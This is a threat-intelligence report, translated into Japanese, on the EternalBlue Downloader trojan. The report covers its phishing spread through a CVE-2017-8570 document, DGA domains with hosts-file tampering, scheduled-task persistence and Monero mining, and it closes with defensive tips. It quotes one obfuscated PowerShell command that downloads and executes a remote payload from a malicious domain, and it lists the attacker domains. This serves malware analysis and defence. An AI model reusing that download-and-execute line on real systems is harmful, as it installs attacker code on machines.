「EternalBlue ダウンローダー トロイの木馬」は、ユーザーのマシンを使用して Monero を採掘し、拡散するためにフィッシング メールを追加します。

出典: テンセント ユジアン 脅威インテリジェンス センター

編集者注: 元のタイトルは「フィッシングメールを通じて「Eternal Blue Downloader Trojan」が新たに拡散、添付ファイルには CVE-2017-8570 脆弱性攻撃コードが含まれている」です。

「Eternal Blue」ダウンローダー型トロイの木馬が感染したユーザーのマシン上で実行されると、現在のユーザーの電子メール アドレス帳が自動的に開き、「urgent.doc」という添付ファイル付きの文書が送信されます。この添付ファイルには、CVE-2017-8570 脆弱性 (Sandworm II とも呼ばれる、リスクの高い Office 脆弱性) に対する攻撃コードが含まれています。

攻撃を受けたユーザーが電子メールを受信し、誤ってドキュメントを開くと、脆弱性がトリガーされ、Powershell コマンドが実行され、mail.jsp がダウンロードされる可能性があります。

 C:/Windows/System32/cmd.exe /c powershell IE`x(New-Object Net.WebC`lient).DownLoadString(http://ap35nf7.jp/mail.jsp?Administrator*OUHH1)

ダウンロードに使用されたドメイン名 ap35nf7.jp は実際には登録されていませんが、アドレス t.awcna.com に解決できます。これは、感染したマシンのローカル ホスト ファイルが改ざんされ、ランダムに生成されたドメイン名がトロイの木馬が使用する悪意のあるアドレスにマッピングされるためです。詳細については、Yujian Threat Intelligence Center が以前に公開したレポート「「Eternal Blue Downloader」トロイの木馬は、ホストを改ざんしてランダムなドメイン名を指定し、複数の脆弱性を利用してイントラネット マイニングを攻撃します。」を参照してください。

この攻撃中、トロイの木馬はランダムに生成された文字とサフィックス「.cn」、「.jp」、「.kr」を DGA ドメイン名として使用し、hosts ファイル内のドメイン名を指します。

 t.tr2q.com、t.awcna.com、t.amynx.com

mail.jsp は非常に難読化されています。複数回の復号化の後、実行用の Powershell スクリプトをダウンロードするための複数のスケジュールされたタスクがインストールされ、新しいスケジュールされたタスク名「Bluetea」が使用されていることがわかります。

「EternalBlue」ダウンローダー型トロイの木馬は、最初の PE サンプル攻撃から、その後の検出回避のための Powershell ファイルレス攻撃への移行、そして複数の種類のスケジュールされたタスクをインストールすることで存続するまで、登場以来更新を止めていません。拡散方法に関しては、サプライチェーン攻撃を通じて感染マシンを大量に蓄積した後、「EternalBlue」脆弱性、MSSqlブラスト、$IPCブラスト、RDPブラストなどの方法を使用してウイルスを拡散し続けました。最近では、DGA ドメイン名攻撃とフィッシング メール攻撃も追加されました。その最終的な目標は、ユーザーのマシンを使用して Monero を採掘し、利益を得ることだけです。

EternalBlue Downloader トロイの木馬の以前のバージョンは、次の表に更新されています。

安全のヒント

1. ユーザーは、不明なソースからの電子メールの添付ファイルを簡単に開かず、電子メールの添付ファイル内のファイルを実行する際には細心の注意を払うことをお勧めします。スクリプトやその他の実行可能ファイルを見つけた場合は、まずウイルス対策ソフトウェアを使用してそれらをスキャンしてください。

2. サーバーは、特に IPC$、MSSQL、および RDP アカウントのパスワードに対して安全なパスワード ポリシーを使用します。弱いパスワードによるブルートフォース攻撃を回避するために、弱いパスワードを使用しないでください。

3. Microsoft のセキュリティ発表に従って、Office の脆弱性 CVE-2017-8570 を速やかに修正します。脆弱性のスキャンと修復が必要です。または、Windows Update が使用されます。